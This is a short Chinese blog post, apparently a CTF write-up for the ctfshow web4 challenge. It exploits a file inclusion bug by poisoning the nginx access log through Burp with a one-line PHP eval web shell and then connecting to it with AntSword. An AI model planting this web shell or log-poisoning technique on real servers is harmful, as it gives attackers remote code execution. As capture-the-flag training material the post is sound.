zoukankan      html  css  js  c++  java
  • CTF show-web4

    日志包含漏洞

    验证是文件包含漏洞

    想读取源码,但是返回error

    ?url=php://filter/read=convert.base64-encode/resource=index.php


    参考了一点其他大佬的WP

    通过查看请求头可以知道服务器为Ubuntu,由nginx搭建的网站,

    nginx的日志文件在/var/log/nginx/access.log和/var/log/nginx/error.log,其中access.log可以打开


    为了防止url编码,需要使用burp

    如果直接在url里面插入一句话会返回:

    400 Bad Request

    因此只能在burp参数里面插入一句话

    <?php eval($_POST['hack']);?>

    之后用蚁剑连接access.log文件就行了,之前的一句话就插入到这里面了,但是网页上是无法显示出来的

    得到flag:

    [Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你
  • 相关阅读:
    Linux添加用户组和删除用户组
    购物意图分析
    架构是什么来的
    如何突破浏览器加载并发数的限制
    写JS自执行函数时要注意的
    网页是什么
    JVM
    javascript的边界
    浏览器
    HTTP
  • 原文地址:https://www.cnblogs.com/echoDetected/p/12394920.html
Copyright © 2011-2022 走看看